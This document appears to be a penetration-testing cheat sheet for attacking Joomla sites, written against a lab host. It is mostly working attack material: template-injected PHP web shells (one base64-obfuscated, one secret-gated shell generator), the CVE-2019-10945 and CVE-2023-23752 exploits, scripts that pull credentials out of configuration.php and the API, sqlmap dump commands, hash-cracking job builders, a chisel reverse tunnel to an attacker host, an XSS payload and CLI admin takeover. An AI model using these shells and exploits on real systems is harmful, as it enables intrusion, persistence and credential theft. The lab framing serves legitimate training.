4. Attacking Joomla

1. Joomla Admin Panel Code Execution (Template Customization)

curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
  • Log in to /administrator with valid administrator credentials.

  • Open Extensions > Templates > Templates, pick the active site template (Protostar here) and edit a file that can be requested directly, such as error.php; add a one-liner like system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); at the top. The file is PHP, so the command runs when the page is requested, as in the curl above.

  • Use a long random parameter name rather than cmd so nobody else finds the shell while it is in place, and remove the injected line when you are done.

2. Joomla Core Directory Traversal (CVE-2019-10945)

python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /
  • Affects Joomla before 3.9.5: the Media Manager (com_media) does not sanitize its folder parameter, which allows directory traversal and authenticated file deletion outside the images directory.

  • Authenticated: the script logs in to /administrator/ with the supplied credentials, so it needs working admin-panel access. It is a fallback when template editing is disabled or not wanted.

  • Lists (and can delete) files under the given --dir, which confirms where files such as configuration.php sit in the web root; it does not return file contents.

3. Joomla Configuration File Exploitation (Manual, if accessible)

curl -s http://dev.inlanefreight.local/configuration.php
  • A correctly served configuration.php is executed by PHP and comes back as an empty body, so this request only pays off when the file is disclosed: a backup copy (configuration.php.bak, configuration.php~, configuration.php.txt), a broken PHP handler, or a read through a shell or traversal.

  • The file defines class JConfig with the database host, user, password, name and table prefix ($dbprefix), plus $secret and any mail or FTP credentials; reuse them against the database and for password spraying elsewhere.
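
Once the file has been read, the values still have to be pulled out of the PHP class. The parser below is an added example for this step, not code from the original notes; SAMPLE_CONFIG is a constructed file in the real JConfig layout (host, user, password, db, dbprefix, secret are genuine Joomla property names, the values are made up).

```python
"""Pull credentials out of a Joomla configuration.php.

Added example, not from the original notes. SAMPLE_CONFIG is constructed in
the real JConfig layout; feed parse_jconfig() the text obtained from a backup
copy, a shell, or a traversal read.
"""
import re
from typing import Dict

SAMPLE_CONFIG = """<?php
class JConfig {
    public $offline = '0';
    public $sitename = 'Inlanefreight Dev';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'joomla_user';
    public $password = 'J00ml4_P4ss!';
    public $db = 'joomla_db';
    public $dbprefix = 'u3a5_';
    public $secret = 'Ab1CdEf2GhI3jKl4';
    public $mailfrom = 'admin@inlanefreight.local';
    public $debug = '0';
}
"""

# Keys worth reporting: secret signs Joomla sessions and tokens, the rest are credentials.
INTERESTING = ("dbtype", "host", "user", "password", "db", "dbprefix", "secret",
               "smtpuser", "smtppass", "ftp_host", "ftp_user", "ftp_pass")

# public $name = 'single' | "double" | bare;  (PHP backslash escapes are handled below)
PROP_RE = re.compile(
    r"""public\s+\$(\w+)\s*=\s*(?:'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)"|([^;]+));"""
)


def parse_jconfig(text: str) -> Dict[str, str]:
    """Return every public property of the JConfig class as a dict."""
    if "class JConfig" not in text:
        raise ValueError("not a Joomla configuration.php")
    out = {}
    for m in PROP_RE.finditer(text):
        name, single, double, bare = m.groups()
        if single is not None:
            out[name] = re.sub(r"\\(['\\])", r"\1", single)      # \' and \\ in single quotes
        elif double is not None:
            out[name] = re.sub(r'\\(["\\$])', r"\1", double)     # \" \\ \$ in double quotes
        else:
            out[name] = bare.strip()
    return out


def credentials(text: str) -> Dict[str, str]:
    """Only the properties an attacker cares about."""
    cfg = parse_jconfig(text)
    return {k: cfg[k] for k in INTERESTING if k in cfg}


def users_table(cfg: Dict[str, str]) -> str:
    """The table prefix is random per install, so the user table is <prefix>users."""
    return cfg["dbprefix"] + "users"


def mysql_command(cfg: Dict[str, str]) -> str:
    """Client invocation that reuses the database credentials (assumes mysqli/mysql)."""
    return "mysql -h {host} -u {user} -p'{password}' {db}".format(**cfg)


if __name__ == "__main__":
    creds = credentials(SAMPLE_CONFIG)
    for key, value in creds.items():
        print(f"{key:10} {value}")
    print(mysql_command(creds), "-e 'SELECT username,email,password FROM", users_table(creds) + "'")
```

The prefix matters more than it looks: every Joomla table, including the one holding password hashes, carries it, and sqlmap's --tables output is the only other place it shows up.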

4. Joomla Extension Exploitation (Manual)

curl -s http://dev.inlanefreight.local/components/[vulnerable_component]/[exploit_path]?param=[malicious_payload]
  • Enumerate installed extensions first: component manifests live at /administrator/components/com_<name>/<name>.xml and front-end code under /components/com_<name>/, and the core version is in /administrator/manifests/files/joomla.xml. Scanners such as droopescan and joomscan automate this.

  • Match the extension name and version against public advisories and craft the request for the identified flaw; the URL above is a template, not a real endpoint.

  • Third-party extensions are the most common way into a Joomla site; exploitable core bugs are comparatively rare.
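
Both the core version check for CVE-2019-10945 (section 2) and extension enumeration (this section) come down to reading Joomla's manifest XML, so one added example serves both. This is not code from the original notes: the manifest paths are real Joomla locations, the two XML documents are constructed samples so it runs offline, and the 3.9.5 threshold is the fixed version for CVE-2019-10945.

```python
"""Fingerprint the Joomla core version and installed components from manifests.

Added example, not from the original notes. Fetch the manifest with curl and
pass the body to parse_manifest(); the XML below is constructed sample data.
"""
import re
import xml.etree.ElementTree as ET

CORE_MANIFEST = "/administrator/manifests/files/joomla.xml"
# CVE-2019-10945 (Media Manager folder traversal) was fixed in Joomla 3.9.5.
CVE_2019_10945_FIXED = (3, 9, 5)

SAMPLE_CORE_XML = """
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>3.9.4</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

SAMPLE_COMPONENT_XML = """
<extension type="component" version="3.1" method="upgrade">
    <name>com_example</name>
    <version>1.2.0</version>
    <description>constructed sample component manifest</description>
</extension>
"""


def parse_manifest(xml_text: str) -> dict:
    """Return name, type and version from a Joomla <extension> manifest."""
    root = ET.fromstring(xml_text.strip())
    if root.tag != "extension":
        raise ValueError("not a Joomla extension manifest")
    return {
        "name": (root.findtext("name") or "").strip(),
        "type": root.get("type", ""),
        "version": (root.findtext("version") or "").strip(),
    }


def version_tuple(version: str) -> tuple:
    """'3.9.4' -> (3, 9, 4); suffixes such as '4.2.8-rc1' are ignored, missing parts are 0."""
    parts = []
    for piece in version.split(".")[:3]:
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def core_has_cve_2019_10945(version: str) -> bool:
    """True for any core version below the 3.9.5 fix."""
    return version_tuple(version) < CVE_2019_10945_FIXED


def component_manifest_path(component: str) -> str:
    """'com_example' -> '/administrator/components/com_example/example.xml'."""
    short = component[4:] if component.startswith("com_") else component
    return f"/administrator/components/com_{short}/{short}.xml"


if __name__ == "__main__":
    core = parse_manifest(SAMPLE_CORE_XML)
    print(CORE_MANIFEST, core, "CVE-2019-10945:", core_has_cve_2019_10945(core["version"]))
    comp = parse_manifest(SAMPLE_COMPONENT_XML)
    print(component_manifest_path(comp["name"]), comp)
```

Manifests are served as static XML, so these requests need no credentials; a 404 on a component manifest simply means that extension is not installed.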

5. Metasploit Joomla Modules (if applicable)

msf6 > search joomla
msf6 > use exploit/unix/webapp/joomla_...
msf6 > set RHOSTS dev.inlanefreight.local
msf6 > set RPORT 80
msf6 > set TARGETURI /administrator/
msf6 > set USERNAME admin
msf6 > set PASSWORD admin
msf6 > set LHOST [your_ip]
msf6 > set LPORT 4444
msf6 > exploit
  • search joomla returns both auxiliary scanners (joomla_version, joomla_plugins, joomla_pages) and exploit modules; pick the one matching the enumerated version or extension and run show options, since TARGETURI, USERNAME and PASSWORD differ per module and only authenticated modules need credentials.

  • Automates exploitation of known vulnerabilities; it does not replace the enumeration above.

6. Database Exploitation (if SQL injection is achieved)

sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" --dbs --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] --tables --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://dev.inlanefreight.local/index.php?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch
  • index.php?id=1 is a placeholder: point sqlmap at the injectable parameter found in a vulnerable extension (core Joomla is not injectable there). --batch accepts the defaults; add --dbms=mysql once the backend is known.

  • The user table is <prefix>_users, with a prefix that is random per install (jos_ on very old sites); dump username, email and password. Current versions store bcrypt ($2y$), older ones PHPass ($P$) or md5:salt.
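
Dumped Joomla hashes come in three formats that need different hashcat modes, and a mixed dump from a long-lived site is common. The classifier below is an added example, not code from the original notes; SAMPLE_ROWS are constructed username/password pairs in the shapes sqlmap returns, and the modes (3200 bcrypt, 400 phpass, 11 "Joomla < 2.5.18") are the real hashcat mode numbers.

```python
"""Sort a <prefix>_users dump into hashcat jobs by hash format.

Added example, not from the original notes; the rows are constructed samples.
"""
import re
from typing import Dict, List, Optional, Tuple

SAMPLE_ROWS: List[Tuple[str, str]] = [  # (username, password) as dumped by sqlmap
    ("admin", "$2y$10$kJs1DXtmkr5uP5CAyFqWEuv.r9z5GhuvBvqyqB0XnKrOUxk6n.bRS"),   # Joomla 3.2+
    ("legacy", "d41d8cd98f00b204e9800998ecf8427e:NN1zsNAzq5dLJbCO1P5dGx3rB4Wk5m1x"),  # Joomla < 2.5.18
    ("phpass", "$P$DmkjJ6dxGOOvj6slSfvhmdkGO7/eYrG"),                           # Joomla 2.5.18 - 3.1
    ("broken", "not-a-hash"),
]

BCRYPT_RE = re.compile(r"\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}")
PHPASS_RE = re.compile(r"\$[PH]\$[./0-9A-Za-z]{31}")
MD5_SALT_RE = re.compile(r"[0-9a-f]{32}:[^\s:]+")   # md5(password + salt):salt


def classify_hash(h: str) -> Tuple[str, Optional[int]]:
    """Return (format name, hashcat mode) or ('unknown', None)."""
    if BCRYPT_RE.fullmatch(h):
        return ("bcrypt", 3200)
    if PHPASS_RE.fullmatch(h):
        return ("phpass", 400)
    if MD5_SALT_RE.fullmatch(h):
        return ("joomla-md5-salt", 11)
    return ("unknown", None)


def hashcat_jobs(rows: List[Tuple[str, str]]) -> Dict[int, List[str]]:
    """Group 'user:hash' lines by hashcat mode; unrecognised hashes are dropped."""
    jobs: Dict[int, List[str]] = {}
    for user, h in rows:
        _, mode = classify_hash(h)
        if mode is None:
            continue
        jobs.setdefault(mode, []).append(f"{user}:{h}")
    return jobs


def hashcat_command(mode: int, hashfile: str, wordlist: str = "rockyou.txt") -> str:
    """--username tells hashcat to ignore the 'user:' prefix on each line."""
    return f"hashcat -m {mode} --username {hashfile} {wordlist}"


if __name__ == "__main__":
    for mode, lines in hashcat_jobs(SAMPLE_ROWS).items():
        print(hashcat_command(mode, f"joomla_m{mode}.txt"))
        for line in lines:
            print("  ", line)
```

Crack the md5:salt and phpass sets first: they are orders of magnitude faster than bcrypt, and the same people often reuse the password on the current account.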

7. Post-Exploitation (Privilege Escalation, Lateral Movement)

  • Linux: linpeas.sh

  • Windows: winpeas.exe

  • Pivoting (chisel runs as a server on the attacking host and as a client on the compromised host; the client connects back to the attacker, not the other way round):

# attacking host: listen and allow reverse tunnels
chisel server -p 8000 --reverse
# compromised Joomla host: connect back and open a SOCKS proxy on the attacker's 127.0.0.1:1080
chisel client [attacker_ip]:8000 R:socks
# alternative when SSH to the target works; 0.0.0.0/0 routes everything, narrow it to the internal subnet where possible
sshuttle -r user@target_ip 0.0.0.0/0
  • Enumerate the compromised system: the web server user, the credentials in configuration.php, sudo rights, and which internal hosts are reachable from it.

  • Use it as a pivot into the internal network (point proxychains at 127.0.0.1:1080 for the chisel SOCKS proxy).

8. Joomla REST API Attacks

curl -s http://dev.inlanefreight.local/api/index.php/v1/users
  • Joomla 4 ships a JSON:API under /api/index.php/v1/; in a default configuration the users endpoint requires an API token (Authorization: Bearer <token>, generated in a user's profile) and answers 401 without one.

  • Joomla 4.0.0 through 4.2.7 (CVE-2023-23752) answered without authentication when public=true was appended: /v1/users?public=true leaks usernames and e-mail addresses, and /v1/config/application?public=true leaks the database credentials.

  • With a token for a sufficiently privileged user the same API can enumerate users and create or modify content and accounts.
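
The API speaks JSON:API, so the useful fields sit under data[].attributes, and the config endpoint spreads one setting per entry. The helper below is an added example, not code from the original notes: the two sample bodies are constructed in that shape (the attribute names id, name, username, email, block, user, password, db, dbprefix are real Joomla fields; the values and the group_names field are assumptions), and the X-header-free Bearer scheme is the documented Joomla API token mechanism.

```python
"""Build Joomla 4 API requests and parse the JSON:API replies.

Added example, not from the original notes. SAMPLE_USERS and SAMPLE_CONFIG are
constructed responses shaped like /v1/users and /v1/config/application.
"""
import json
from typing import Dict, List, Optional

SAMPLE_USERS = json.dumps({
    "links": {"self": "http://dev.inlanefreight.local/api/index.php/v1/users"},
    "data": [
        {"type": "users", "id": "871", "attributes": {
            "id": 871, "name": "Administrator", "username": "admin",
            "email": "admin@inlanefreight.local", "block": 0, "group_names": "Super Users"}},
        {"type": "users", "id": "872", "attributes": {
            "id": 872, "name": "Editor", "username": "editor",
            "email": "editor@inlanefreight.local", "block": 1, "group_names": "Editor"}},
    ],
})

SAMPLE_CONFIG = json.dumps({  # one attribute per entry, as the config endpoint returns it
    "data": [
        {"type": "application", "id": "224", "attributes": {"offline": False, "id": 224}},
        {"type": "application", "id": "224", "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"user": "joomla_user", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"password": "J00ml4_P4ss!", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla_db", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "u3a5_", "id": 224}},
    ],
})


def api_url(base_url: str, path: str, public: bool = False) -> str:
    """public=True appends the CVE-2023-23752 bypass parameter."""
    url = base_url.rstrip("/") + "/api/index.php/" + path.lstrip("/")
    return url + "?public=true" if public else url


def api_headers(token: Optional[str] = None) -> Dict[str, str]:
    """Accept header for JSON:API plus the Bearer token when we have one."""
    headers = {"Accept": "application/vnd.api+json"}
    if token:
        headers["Authorization"] = f"Bearer {token}"
    return headers


def parse_users(body: str) -> List[dict]:
    """Flatten /v1/users into one dict per account."""
    users = []
    for item in json.loads(body).get("data", []):
        if item.get("type") != "users":
            continue
        a = item.get("attributes", {})
        users.append({"id": item.get("id"), "username": a.get("username"),
                      "email": a.get("email"), "groups": a.get("group_names"),
                      "blocked": bool(a.get("block", 0))})
    return users


def merge_config(body: str) -> dict:
    """Merge the per-entry attributes of /v1/config/application into one dict."""
    merged = {}
    for item in json.loads(body).get("data", []):
        for key, value in item.get("attributes", {}).items():
            if key != "id":
                merged[key] = value
    return merged


def db_credentials(body: str) -> dict:
    cfg = merge_config(body)
    return {k: cfg.get(k) for k in ("host", "user", "password", "db", "dbprefix")}


if __name__ == "__main__":
    print(api_url("http://dev.inlanefreight.local", "v1/users", public=True), api_headers())
    for u in parse_users(SAMPLE_USERS):
        print(u)
    print(db_credentials(SAMPLE_CONFIG))
```

Whether the bypass worked is visible from the status code alone: a patched site returns 401 with or without public=true, a vulnerable one returns 200 with the data above.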

9. Advanced Web Shell Techniques

echo '<?php $s="c3lzdGVtKCRfR0VUWyJjbWQiXSk7"; eval(base64_decode($s)); ?>' > shell.php
  • Writes a minimal shell whose base64 payload decodes to system($_GET["cmd"]);. Note that php -r would execute the code locally rather than write the file; echo is what produces shell.php.

  • Base64-wrapped eval is itself a well-known signature for AV and web-shell scanners, so this kind of obfuscation buys little; a non-obvious file name and parameter name matter more.

  • Gate the shell with a secret (an extra parameter or header checked before anything runs) so it cannot be used by anyone else, and delete it when the engagement ends.
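
The template one-liner from section 1 and the authenticated shell this section asks for are the same artefact, so one added example covers both. It is not code from the original notes: the parameter name and secret are generated at run time, the X-Auth header is this example's choice, the target path defaults to the Protostar error.php used above, and the fake HTTP response in the offline run is an assumption. The PHP it emits uses plain system() guarded by a hash comparison instead of base64/eval.

```python
"""Authenticated PHP command shell for Joomla template injection.

Added example, not from the original notes. make_php_shell() produces the line
to paste at the top of the template file; run_cmd() drives it afterwards.
"""
import hashlib
import secrets
import urllib.request
from typing import Callable, Dict, Tuple
from urllib.parse import urlencode


def make_param_name() -> str:
    """32 random hex characters; unlike 'cmd' nobody will guess it."""
    return secrets.token_hex(16)


def make_php_shell(param: str, secret: str) -> str:
    """PHP one-liner to insert into the template file.

    The command runs only when the request carries the secret in an X-Auth
    header; only the SHA-256 of the secret is written into the file, and
    hash_equals() keeps the comparison constant-time.
    """
    digest = hashlib.sha256(secret.encode()).hexdigest()
    return (
        "<?php if (isset($_GET['{p}']) && isset($_SERVER['HTTP_X_AUTH']) && "
        "hash_equals('{d}', hash('sha256', $_SERVER['HTTP_X_AUTH']))) "
        "{{ system($_GET['{p}']); exit; }} ?>"
    ).format(p=param, d=digest)


def build_request(base_url: str, param: str, secret: str, cmd: str,
                  path: str = "/templates/protostar/error.php") -> Tuple[str, Dict[str, str]]:
    """URL and headers for one command against the injected file."""
    url = base_url.rstrip("/") + path + "?" + urlencode({param: cmd})
    return url, {"X-Auth": secret}


def http_get(url: str, headers: Dict[str, str]) -> str:
    """Real transport; replaced by a fake in the offline test."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def run_cmd(base_url: str, param: str, secret: str, cmd: str,
            fetch: Callable[[str, Dict[str, str]], str] = http_get) -> str:
    url, headers = build_request(base_url, param, secret, cmd)
    return fetch(url, headers)


if __name__ == "__main__":
    param, secret = make_param_name(), secrets.token_urlsafe(24)
    print("paste into error.php:\n", make_php_shell(param, secret))
    url, headers = build_request("http://dev.inlanefreight.local", param, secret, "id")
    print(f"\ncurl -s -H 'X-Auth: {headers['X-Auth']}' '{url}'")
```

Because the PHP fragment is inserted through the Template editor, Joomla itself logs nothing about the shell; the only trace is the modified template file, which is also the only thing that has to be removed afterwards.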

10. Client-Side Attacks (XSS)

curl "http://dev.inlanefreight.local/index.php?param=<script>alert(1)</script>"
  • param is a placeholder for whichever input is reflected (search terms, extension parameters, comment fields); curl with -G --data-urlencode is the safer way to send the payload URL-encoded.

  • Check whether the payload comes back unencoded in the response body; if it does, it can be used against site users and, via a stored payload, against administrators (session theft, actions in the admin panel).

11. Joomla CLI (if accessible)

php cli/joomla.php user:list
  • Joomla 4+ ships a console at cli/joomla.php, run from the site root with the web server's PHP. With shell access it lists users and, through user:add, user:reset-password and user:addtogroup, creates or takes over an administrator account without touching the database directly. Joomla 3 has no such console.

Important Things:

  • Extension Vulnerabilities: Prioritize extension enumeration and testing; third-party extensions are the usual entry point.

  • Configuration Exposure: Check for exposed or backed-up copies of configuration.php; its database credentials and secret unlock everything else.

  • Web Shell Hygiene: Random file and parameter names, an access secret, and removal at the end.

  • Reporting: Document all findings and actions, including every file modified on the target.

  • Stay Updated: Keep up with Joomla security advisories.
